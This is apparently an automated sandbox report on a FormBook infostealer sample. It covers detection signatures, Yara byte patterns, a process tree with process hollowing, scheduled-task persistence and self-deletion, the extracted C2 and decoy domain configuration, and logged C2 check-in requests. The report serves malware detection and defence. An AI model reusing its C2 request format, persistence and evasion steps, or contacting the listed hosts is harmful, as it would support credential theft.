Loading ...

Play interactive tourEdit tour

Windows Analysis Report tgamf4XuLa

Overview

General Information

Sample Name:tgamf4XuLa (renamed file extension from none to exe)
Analysis ID:483617
MD5:f8146a71dedc3eeeaa1624d6832c39a4
SHA1:b1007a3beab21c77513bb9c4e6fc2a04c6346c04
SHA256:3611c1a2e9d1897825d5e7100a1c01d807f62a9c75d5f12602c168b0726d56ca
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • tgamf4XuLa.exe (PID: 6056 cmdline: 'C:\Users\user\Desktop\tgamf4XuLa.exe' MD5: F8146A71DEDC3EEEAA1624D6832C39A4)
    • schtasks.exe (PID: 5080 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • tgamf4XuLa.exe (PID: 1956 cmdline: C:\Users\user\Desktop\tgamf4XuLa.exe MD5: F8146A71DEDC3EEEAA1624D6832C39A4)
      • explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6364 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6428 cmdline: /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.dressmids.com/vuja/"], "decoy": ["maryjanearagon.com", "casualwearus.com", "thephonecasedepot.com", "twinpeaksyouthbasketball.com", "secure-filliale.com", "thecoastalhomeshop.com", "poloandaccessories.com", "thesouthernchildtn.com", "whereallroadslead.com", "harecase.com", "discomountainkombucha.com", "tjandamber.com", "yctyhb.com", "miccitypb.com", "niliana.com", "fraktal.media", "goodgrrrldesign.com", "tcheapvrwdshop.com", "orchid-nirvana2.homes", "mckinleyacreage.com", "3333tax.com", "florentinatravel.com", "ecorna.com", "bold2x.com", "syzhtr.com", "seifenliebe.info", "6144prestoncircle.com", "simmetrypcs.com", "bottomslum.com", "affordablejetski.net", "hellocharmaine.com", "jvfojqjr.icu", "colourfulcollective.travel", "life2you.com", "d0berman245.xyz", "realstylecelebz.com", "thisisalemon.com", "fizzandfun.com", "expertexceleratorchallenge.com", "twpjg.com", "testnora.com", "knothairbandsny.com", "racanelliestimating.com", "aryaanenterprises.com", "cherrybunk.life", "beard-fuel.com", "reebootwithjoe.com", "vip5-paizacasino.com", "nobelcafe.com", "saifreshmart.com", "astcvic.com", "noblehousekitchen.com", "facebooktransfer.com", "humanareachreards.com", "parttimesneakerhead.com", "geliboluwebtasarim.com", "ripvangordo.com", "hitcitybaseball.net", "hostingfun.net", "gfd.xyz", "gighomesale.com", "allthatrom.com", "allenleather.com", "officallive33.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x4695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x4181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x4797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x33fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xa82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x66b9:$sqlite3step: 68 34 1C 7B E1
    • 0x67cc:$sqlite3step: 68 34 1C 7B E1
    • 0x66e8:$sqlite3text: 68 38 2A 90 C5
    • 0x680d:$sqlite3text: 68 38 2A 90 C5
    • 0x66fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6823:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.tgamf4XuLa.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.tgamf4XuLa.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.tgamf4XuLa.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        6.2.tgamf4XuLa.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.2.tgamf4XuLa.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.dressmids.com/vuja/"], "decoy": ["maryjanearagon.com", "casualwearus.com", "thephonecasedepot.com", "twinpeaksyouthbasketball.com", "secure-filliale.com", "thecoastalhomeshop.com", "poloandaccessories.com", "thesouthernchildtn.com", "whereallroadslead.com", "harecase.com", "discomountainkombucha.com", "tjandamber.com", "yctyhb.com", "miccitypb.com", "niliana.com", "fraktal.media", "goodgrrrldesign.com", "tcheapvrwdshop.com", "orchid-nirvana2.homes", "mckinleyacreage.com", "3333tax.com", "florentinatravel.com", "ecorna.com", "bold2x.com", "syzhtr.com", "seifenliebe.info", "6144prestoncircle.com", "simmetrypcs.com", "bottomslum.com", "affordablejetski.net", "hellocharmaine.com", "jvfojqjr.icu", "colourfulcollective.travel", "life2you.com", "d0berman245.xyz", "realstylecelebz.com", "thisisalemon.com", "fizzandfun.com", "expertexceleratorchallenge.com", "twpjg.com", "testnora.com", "knothairbandsny.com", "racanelliestimating.com", "aryaanenterprises.com", "cherrybunk.life", "beard-fuel.com", "reebootwithjoe.com", "vip5-paizacasino.com", "nobelcafe.com", "saifreshmart.com", "astcvic.com", "noblehousekitchen.com", "facebooktransfer.com", "humanareachreards.com", "parttimesneakerhead.com", "geliboluwebtasarim.com", "ripvangordo.com", "hitcitybaseball.net", "hostingfun.net", "gfd.xyz", "gighomesale.com", "allthatrom.com", "allenleather.com", "officallive33.com"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: tgamf4XuLa.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\HpnpObXJP.exeJoe Sandbox ML: detected
          Source: 6.2.tgamf4XuLa.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: tgamf4XuLa.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: tgamf4XuLa.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: control.pdb source: tgamf4XuLa.exe, 00000006.00000002.343389175.0000000001380000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: tgamf4XuLa.exe, 00000006.00000002.343446284.00000000013F0000.00000040.00000001.sdmp, control.exe, 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: tgamf4XuLa.exe, 00000006.00000002.343446284.00000000013F0000.00000040.00000001.sdmp, control.exe
          Source: Binary string: control.pdbUGP source: tgamf4XuLa.exe, 00000006.00000002.343389175.0000000001380000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 4x nop then pop edi6_2_00415691
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi20_2_02ED5691

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49780 -> 52.25.92.0:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49780 -> 52.25.92.0:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49780 -> 52.25.92.0:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49790 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49790 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49790 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49791 -> 99.83.154.118:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49791 -> 99.83.154.118:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49791 -> 99.83.154.118:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 34.98.99.30:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 34.98.99.30:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 34.98.99.30:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49793 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49793 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49793 -> 91.195.240.94:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.94 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tjandamber.com
          Source: C:\Windows\explorer.exeDomain query: www.fraktal.media
          Source: C:\Windows\explorer.exeDomain query: www.expertexceleratorchallenge.com
          Source: C:\Windows\explorer.exeNetwork Connect: 52.25.92.0 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.98.99.30 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.d0berman245.xyz
          Source: C:\Windows\explorer.exeDomain query: www.cherrybunk.life
          Source: C:\Windows\explorer.exeDomain query: www.hellocharmaine.com
          Source: C:\Windows\explorer.exeDomain query: www.syzhtr.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 99.83.154.118 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.72.144.19 80Jump to behavior
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.d0berman245.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.dressmids.com/vuja/
          Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=xxaskX4zCBVE3yBbpvO7oTQxeCyuhPQrJ3bXakBVisDWUfPX6szXkiX7lnBBy6F9sRNz HTTP/1.1Host: www.cherrybunk.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?a6PLdH6=knesP9qPdEIwhrsdCBVrK6TYPa8ARfupLdS+O1KjpVkHadf5O3a6XCWpr2FomIuS86ow&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.d0berman245.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=+jKwoP3rxSUE2G3GWZal8U7hYP6reGb39kDXBTdBOy+lOhqfFK02kSVdLKlhCp2Y/9bB HTTP/1.1Host: www.fraktal.mediaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?a6PLdH6=QFFty8wvqhCytrBgHARX2ZkDyAOTnUZPmU5cb5PMMJEj0bAx9fBxVhYMw+XdeJtryV9Z&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.expertexceleratorchallenge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY HTTP/1.1Host: www.hellocharmaine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?a6PLdH6=u+wR1aKzpDV/TxGllf2QnEgeBGa/HBhCNRhMkmFjTPYp6U2j3/+A9H921q8yWaN2LpI/&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.syzhtr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=O/mUfy2FFtS6I/aReU4qHel2aPwRekNUtr7VAEKDTW8BEYcE6LKZB1SF0N7UsHI7MTf5 HTTP/1.1Host: www.tjandamber.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=mvPzLoePd3E50JyZDmieD6pkHjcUl/YW6tCUslk4/nfE0VzZdnTMarol9oC9qsPy2Se0 HTTP/1.1Host: www.realstylecelebz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?a6PLdH6=mgzvXufYj6psHtNzSOMfQOc1unGQJGuCHGGdhDQCsGfwe59mkNL58xvD94UsnjjJj5NK&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.dressmids.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd HTTP/1.1Host: www.discomountainkombucha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 15 Sep 2021 08:10:24 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmpString found in binary or memory: https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886
          Source: control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmpString found in binary or memory: https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png
          Source: control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmpString found in binary or memory: https://www.value-domain.com/
          Source: control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmpString found in binary or memory: https://www.value-domain.com/modall.php
          Source: unknownDNS traffic detected: queries for: www.cherrybunk.life
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=xxaskX4zCBVE3yBbpvO7oTQxeCyuhPQrJ3bXakBVisDWUfPX6szXkiX7lnBBy6F9sRNz HTTP/1.1Host: www.cherrybunk.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?a6PLdH6=knesP9qPdEIwhrsdCBVrK6TYPa8ARfupLdS+O1KjpVkHadf5O3a6XCWpr2FomIuS86ow&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.d0berman245.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=+jKwoP3rxSUE2G3GWZal8U7hYP6reGb39kDXBTdBOy+lOhqfFK02kSVdLKlhCp2Y/9bB HTTP/1.1Host: www.fraktal.mediaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?a6PLdH6=QFFty8wvqhCytrBgHARX2ZkDyAOTnUZPmU5cb5PMMJEj0bAx9fBxVhYMw+XdeJtryV9Z&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.expertexceleratorchallenge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY HTTP/1.1Host: www.hellocharmaine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?a6PLdH6=u+wR1aKzpDV/TxGllf2QnEgeBGa/HBhCNRhMkmFjTPYp6U2j3/+A9H921q8yWaN2LpI/&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.syzhtr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=O/mUfy2FFtS6I/aReU4qHel2aPwRekNUtr7VAEKDTW8BEYcE6LKZB1SF0N7UsHI7MTf5 HTTP/1.1Host: www.tjandamber.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=mvPzLoePd3E50JyZDmieD6pkHjcUl/YW6tCUslk4/nfE0VzZdnTMarol9oC9qsPy2Se0 HTTP/1.1Host: www.realstylecelebz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?a6PLdH6=mgzvXufYj6psHtNzSOMfQOc1unGQJGuCHGGdhDQCsGfwe59mkNL58xvD94UsnjjJj5NK&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.dressmids.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd HTTP/1.1Host: www.discomountainkombucha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
